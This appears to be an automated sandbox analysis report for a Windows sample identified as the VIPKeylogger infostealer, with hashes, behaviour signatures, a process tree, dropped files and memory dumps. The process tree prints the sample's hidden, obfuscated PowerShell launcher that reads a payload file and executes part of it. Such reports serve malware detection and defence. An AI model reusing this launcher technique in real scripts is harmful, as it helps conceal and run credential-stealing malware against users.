Overview

overview

10

Static

static

3

c9f7cbb4a9...db.exe

windows7-x64

8

c9f7cbb4a9...db.exe

windows10-2004-x64

10

Fiskerettens.ps1

windows7-x64

3

Fiskerettens.ps1

windows10-2004-x64

8

Analysis

  • max time kernel
    148s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08-11-2024 12:22

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    c9f7cbb4a9e4e0db0e717cd71d3b5e5162544866bc7c74cde42fb9240cf193db.exe

  • Size

    1.2MB

  • MD5

    cfd68f7d943d702ade1744a68308f0ca

  • SHA1

    7e7bb8ff7a01ace1cee4b93d087bfad75aaefa0c

  • SHA256

    c9f7cbb4a9e4e0db0e717cd71d3b5e5162544866bc7c74cde42fb9240cf193db

  • SHA512

    9a198311992a149e0974d2187be2838a3ed969d284e0722e5a3ddb576c80f0d8eaed6b25683f10ffff8ccfb6bcfcc58ae4ce95747ce8c24e8100387f13f3b7e6

  • SSDEEP

    24576:voqqHmQ2mlKCS22++Gpk3C99ZwYAKImqcSb7CkSE9bXy2pf3zxFTB:voZmQ7N25Gpk3CqvTHcQC3E97xF3zTV

Score
10/10
vipkeyloggercollectiondiscoveryexecutionkeyloggerstealer

Malware Config

Extracted

Family

vipkeylogger

Credentials

Signatures

  • VIPKeylogger

    VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.

    stealerkeyloggervipkeylogger
  • Vipkeylogger family
    vipkeylogger
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

    execution
  • Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs
    collection
  • Blocklisted process makes network request 16 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • NSIS installer 2 IoCs
    installer
  • Suspicious behavior: EnumeratesProcesses 21 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 46 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\c9f7cbb4a9e4e0db0e717cd71d3b5e5162544866bc7c74cde42fb9240cf193db.exe
    "C:\Users\Admin\AppData\Local\Temp\c9f7cbb4a9e4e0db0e717cd71d3b5e5162544866bc7c74cde42fb9240cf193db.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:5008
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle hidden "$Analytique=Get-Content -raw 'C:\Users\Admin\AppData\Local\Temp\carinal\Coracosteon\Fiskerettens.udk';$Terminaladgang=$Analytique.SubString(53834,3);.$Terminaladgang($Analytique)"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1968
      • C:\Windows\SysWOW64\msiexec.exe
        "C:\Windows\SysWOW64\msiexec.exe"
        3⤵
        • Accesses Microsoft Outlook profiles
        • Blocklisted process makes network request
        • Suspicious use of NtCreateThreadExHideFromDebugger
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:5084
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle hidden "$Analytique=Get-Content -raw 'C:\Users\Admin\AppData\Local\Temp\carinal\Coracosteon\Fiskerettens.udk';$Terminaladgang=$Analytique.SubString(53834,3);.$Terminaladgang($Analytique)"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1636
      • C:\Windows\SysWOW64\msiexec.exe
        "C:\Windows\SysWOW64\msiexec.exe"
        3⤵
        • Accesses Microsoft Outlook profiles
        • Blocklisted process makes network request
        • Suspicious use of NtCreateThreadExHideFromDebugger
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • outlook_office_path
        • outlook_win_path
        PID:2872

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199
    Filesize

    854B

    MD5

    e935bc5762068caf3e24a2683b1b8a88

    SHA1

    82b70eb774c0756837fe8d7acbfeec05ecbf5463

    SHA256

    a8accfcfeb51bd73df23b91f4d89ff1a9eb7438ef5b12e8afda1a6ff1769e89d

    SHA512

    bed4f6f5357b37662623f1f8afed1a3ebf3810630b2206a0292052a2e754af9dcfe34ee15c289e3d797a8f33330e47c14cbefbc702f74028557ace29bf855f9e

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
    Filesize

    1KB

    MD5

    69f99c86fe2eb364c85f2855eaf0181c

    SHA1

    b2c67cb14b0fa995cfb28fee7f88900dff16e141

    SHA256

    8abdc75405022ee5b62b3b20ff5f16933f244392a40589f699ffbd1989def764

    SHA512

    7f47dc1c0cb2cab59546be6099091757e97c8568be3c480cfca34ac29766e6ab87815c41cc2445910c9783e7ab9746a42296bc34f875d6f1ce054e795a581bc4

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\4FA45AE1010E09657982D8D28B3BD38E_CC847C1C687BCB4C6B5074DF051D733B
    Filesize

    471B

    MD5

    eb6bc101982368007ac3b34f486f6dcc

    SHA1

    68762c5224a2a52b4e3900c3caf42b3424313ab7

    SHA256

    001eb218131094dbc95816dd35ccd6560a3163c9729f2a5fc2c59c088b5093b6

    SHA512

    42852ac2e830a0f84489620618f4e1bd255b24c9d00f2c9952d3704516d7789e56f05aae116d7cf79751bce67a099153991abfa2ee1d4b202791544894c64d03

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_CD08734C3F770C014F2620E6CA4CE9C7
    Filesize

    472B

    MD5

    6b5010acac3a2725f44ea906344866ff

    SHA1

    3ef75e7c28f48d14604283edc1a08c542a534933

    SHA256

    03f0f283672755f5f41360b1d2261687492771933d7d1e00aee0447a5a918c29

    SHA512

    ade01f0b56523ba9c9f044b57987a5b7785fc055cddf50ba1486e26ab05b11d6c96d1f87b360802edf421d545570e21a6e29cf488004b132db692ca3997af03e

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199
    Filesize

    170B

    MD5

    d5c21c39647f71b899b75070fa2f10c8

    SHA1

    a96bf937068f3806dffbc0ab024ac4f16ec07d81

    SHA256

    d8995adfae4c2da2e7a14de1d6bf6829af4002c0c9736fa8b0269bc976ae2ebb

    SHA512

    dcb96e001480fdf9a8d81f0de0bbd7164232ea12e58482bb58c98713234d99b1a800abfb2b37601a449a1e43df1eb7437643a77fd7c93a4542cf8d0de6a145d9

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199
    Filesize

    170B

    MD5

    79639f1d19fba6aeac911a2cd6accd01

    SHA1

    4a466c6deef1938f0f54ddc91e7079dcf7e92015

    SHA256

    aad3c351ca0330a61bcc68f96158f0979570642cef7c4b228c121cda70f4c2c3

    SHA512

    7dbdd472fe242246871eef41bf0b10efaee22d883eb981518b84fb4f89f4acda24a6c76cb8f5f4176d0410334019f0bfe3e11e587e295eabafc23ae22d9e1562

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
    Filesize

    410B

    MD5

    ca8607684b3d65c27dd6e832f9b0fd14

    SHA1

    61366d148d4d060c9469b80c2a614966b12c1956

    SHA256

    95a19f4c927cf1d54d5ece831d29c4c2772bf7712aac95e5631971cbfc3ea916

    SHA512

    b89ab12fb4d52e61440a0fda64c436af604f5323be1285236ecfb4c164f52446c22b4efe5db07a41ce1af675c3c94c4344082a4b7e01d80496ba85a5ac270ec7

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4FA45AE1010E09657982D8D28B3BD38E_CC847C1C687BCB4C6B5074DF051D733B
    Filesize

    402B

    MD5

    95f915dbd084d7b1773aca81b6d8be30

    SHA1

    9b12fc00c68c8b4ed146452c921cafe6e82628f2

    SHA256

    72c76a2f8886119f373ee52106a1eb1a61afb5f60285d564e32c34642947ab63

    SHA512

    5b0765056e04ad7f2d2fd6afca8521d8d386ecfba30b83c8fec1f36f9965dc8f7f9dcc073ffbcba7bb9171334d753ba3900531372257b750ca92ff979c63f911

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_CD08734C3F770C014F2620E6CA4CE9C7
    Filesize

    398B

    MD5

    e940135da0d612c950b9823f46489662

    SHA1

    90aa159dd618a84b4ae2af6b28f352c6a45747b4

    SHA256

    fc7be9a88f45b0d19861f56fe1c02fc2c5fe78b654719ff64f4cbddb61b460f5

    SHA512

    563ea40d03f28fb8317485d9710ec0f1a1831e11d694f349f8e24907475e8624449eb3e216c198f6927a53f202ddb1a33fa86b50ded893e7d8e1360a73bdba20

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
    Filesize

    53KB

    MD5

    01404e51f6442f60e478c306b1e6e52e

    SHA1

    37f234ccf5611b8309023410ceb9e76ad81f5678

    SHA256

    d4356dd23aa2e811712132f9718786331661a1bd0d062c49cb76807b9563928b

    SHA512

    94a9d843ae4055e2a9b412f03cba85e2d7b804ec3106f059d14ca50b15ae4acc6cd452f9461c2e21d1632d06848c969732c539aea17869b8b3a2f5ab93b891d7

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4ovrw0mu.lzp.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\carinal\Coracosteon\Fiskerettens.udk
    Filesize

    52KB

    MD5

    faf341db23ab218989520cdb488bd287

    SHA1

    dea8d00a028dbf3db1e4dc43c78f4953146a5512

    SHA256

    31986b7f9a99a42e3d59c24fa9a3530f7436f99ed3c7651f04debd3f62c44a89

    SHA512

    99bdfe35735c579102859774c3bd0809858d9628b3691ad4a9955016822139fe96f1921eed5d7dc57350faf6fbb4ba4f820278b04bb22ff88dcfefa2909da79f

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\carinal\Coracosteon\Musikgruppen.par
    Filesize

    333KB

    MD5

    d4d13386bf47d7fdea892ffafc3c8b42

    SHA1

    9e8364871a5618d3e481fe93979450b4450d4f07

    SHA256

    8b6551ac3e6a95a424d9be1cb4032c8d72d6771a723245589e2caa51e412ff23

    SHA512

    ae9d94ce9baad0bf22db3f7510855fca31564302263038262f38b3f86915ee64ff9851c5f0e7670a103e6851a1b06ec34071aff12477ca546e4cbb94ada8db31

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\carinal\Coracosteon\c9f7cbb4a9e4e0db0e717cd71d3b5e5162544866bc7c74cde42fb9240cf193db.exe
    Filesize

    1.2MB

    MD5

    cfd68f7d943d702ade1744a68308f0ca

    SHA1

    7e7bb8ff7a01ace1cee4b93d087bfad75aaefa0c

    SHA256

    c9f7cbb4a9e4e0db0e717cd71d3b5e5162544866bc7c74cde42fb9240cf193db

    SHA512

    9a198311992a149e0974d2187be2838a3ed969d284e0722e5a3ddb576c80f0d8eaed6b25683f10ffff8ccfb6bcfcc58ae4ce95747ce8c24e8100387f13f3b7e6

    Download Submit

  • memory/1636-73-0x0000000074270000-0x0000000074A20000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/1636-75-0x0000000007200000-0x0000000007224000-memory.dmp

    Filesize

    144KB

    Download

  • memory/1636-8-0x0000000074270000-0x0000000074A20000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/1636-10-0x0000000004E00000-0x0000000005428000-memory.dmp

    Filesize

    6.2MB

    Download

  • memory/1636-9-0x0000000074270000-0x0000000074A20000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/1636-12-0x0000000004D90000-0x0000000004DB2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/1636-22-0x0000000074270000-0x0000000074A20000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/1636-92-0x0000000074270000-0x0000000074A20000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/1636-65-0x0000000007000000-0x000000000701E000-memory.dmp

    Filesize

    120KB

    Download

  • memory/1636-68-0x0000000074270000-0x0000000074A20000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/1636-67-0x0000000007070000-0x0000000007113000-memory.dmp

    Filesize

    652KB

    Download

  • memory/1636-87-0x0000000074270000-0x0000000074A20000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/1636-53-0x0000000070E70000-0x00000000711C4000-memory.dmp

    Filesize

    3.3MB

    Download

  • memory/1636-46-0x00000000706F0000-0x000000007073C000-memory.dmp

    Filesize

    304KB

    Download

  • memory/1636-84-0x0000000074270000-0x0000000074A20000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/1636-82-0x0000000074270000-0x0000000074A20000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/1636-80-0x0000000074270000-0x0000000074A20000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/1636-71-0x0000000007190000-0x000000000719A000-memory.dmp

    Filesize

    40KB

    Download

  • memory/1636-74-0x00000000071D0000-0x00000000071FA000-memory.dmp

    Filesize

    168KB

    Download

  • memory/1968-81-0x000000007427E000-0x000000007427F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1968-14-0x0000000005B20000-0x0000000005B86000-memory.dmp

    Filesize

    408KB

    Download

  • memory/1968-36-0x00000000069D0000-0x00000000069EE000-memory.dmp

    Filesize

    120KB

    Download

  • memory/1968-13-0x0000000005AB0000-0x0000000005B16000-memory.dmp

    Filesize

    408KB

    Download

  • memory/1968-72-0x0000000074270000-0x0000000074A20000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/1968-44-0x0000000007E20000-0x0000000007E52000-memory.dmp

    Filesize

    200KB

    Download

  • memory/1968-39-0x0000000006F00000-0x0000000006F1A000-memory.dmp

    Filesize

    104KB

    Download

  • memory/1968-83-0x0000000074270000-0x0000000074A20000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/1968-45-0x00000000706F0000-0x000000007073C000-memory.dmp

    Filesize

    304KB

    Download

  • memory/1968-85-0x0000000009330000-0x000000000E06B000-memory.dmp

    Filesize

    77.2MB

    Download

  • memory/1968-70-0x0000000074270000-0x0000000074A20000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/1968-88-0x0000000074270000-0x0000000074A20000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/1968-15-0x0000000074270000-0x0000000074A20000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/1968-47-0x0000000070E70000-0x00000000711C4000-memory.dmp

    Filesize

    3.3MB

    Download

  • memory/1968-93-0x0000000074270000-0x0000000074A20000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/1968-21-0x00000000063F0000-0x0000000006744000-memory.dmp

    Filesize

    3.3MB

    Download

  • memory/1968-43-0x0000000008CB0000-0x000000000932A000-memory.dmp

    Filesize

    6.5MB

    Download

  • memory/1968-6-0x000000007427E000-0x000000007427F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1968-37-0x00000000069F0000-0x0000000006A3C000-memory.dmp

    Filesize

    304KB

    Download

  • memory/1968-11-0x0000000074270000-0x0000000074A20000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/1968-41-0x0000000008080000-0x0000000008624000-memory.dmp

    Filesize

    5.6MB

    Download

  • memory/1968-38-0x0000000007A30000-0x0000000007AC6000-memory.dmp

    Filesize

    600KB

    Download

  • memory/1968-40-0x0000000006F80000-0x0000000006FA2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/1968-7-0x0000000003400000-0x0000000003436000-memory.dmp

    Filesize

    216KB

    Download

  • memory/2872-134-0x0000000001400000-0x0000000001448000-memory.dmp

    Filesize

    288KB

    Download

  • memory/2872-133-0x0000000001400000-0x0000000002654000-memory.dmp

    Filesize

    18.3MB

    Download

  • memory/5084-131-0x0000000001010000-0x0000000001058000-memory.dmp

    Filesize

    288KB

    Download

  • memory/5084-130-0x0000000001010000-0x0000000002264000-memory.dmp

    Filesize

    18.3MB

    Download

  • memory/5084-132-0x00000000249D0000-0x0000000024A6C000-memory.dmp

    Filesize

    624KB

    Download

  • memory/5084-137-0x0000000025530000-0x00000000256F2000-memory.dmp

    Filesize

    1.8MB

    Download

  • memory/5084-138-0x0000000024D30000-0x0000000024D80000-memory.dmp

    Filesize

    320KB

    Download

  • memory/5084-141-0x0000000024E60000-0x0000000024EF2000-memory.dmp

    Filesize

    584KB

    Download

  • memory/5084-142-0x0000000024E10000-0x0000000024E1A000-memory.dmp

    Filesize

    40KB

    Download